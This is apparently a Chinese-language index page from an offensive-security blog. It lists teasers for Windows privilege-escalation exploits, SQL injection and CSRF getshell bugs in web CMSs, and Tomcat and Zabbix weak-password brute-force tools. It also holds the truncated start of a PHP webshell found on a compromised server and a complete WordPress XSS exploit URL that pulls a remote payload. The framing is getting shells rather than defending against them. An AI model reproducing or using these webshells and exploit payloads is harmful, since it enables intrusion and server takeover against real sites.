MS16-014【64位可用】webshell版

今天在翻exploit-db的时候无意中看到一种新的获得ntoskrnl基地址的方法,而且32、64通用。。。

MS16-032 EPATHOBJ 0day exploit 提权工具和代码

MS16-032

韩国kimson程序写shell

客户让测试的一个站的时候碰到这个程序,在韩国带颜色的交友站大部分用的是这个。
这程序注入有多几个,但是后台是独立可改目录名的,所以数据多的时候感觉注入也没啥用

C:\WWW\kimson\_system\module\chat\msgAct.php

Ecshop3.0多处SQL注射漏洞

ecshop SQL注射漏洞

蝉知CMS5.3 CRSF getshell

1122145631ccefd82ceae87f0b819ab0ca19094a[1]

tomcat批量弱口令爆破工具(py版)

tomcat弱口令批量扫描的工具

zabbix初始口令批量检测小脚本

-cache-6a112adc88862c4566b909ad702699f3_1.png

服务器上捡的php一句话

<?php 
error_reporting(0); 
set_time_limit(0);
function My_base($data,$key){
        $key=md5($key);
       &

WordPress 4.5.1 XSS 0day

http://0day5.com/wp-includes/js/mediaelement/flashmediaelement.swf?jsinitfu%xnction=console.log&isvi%xdeo=true&auto%xplay=true&fi%xle=http://midzer0.github.io/2016/wordpress-4.5.1-xss/exp.m3u8

WIN2003本地提权检测工具及源码

WIN2003本地提权检测工具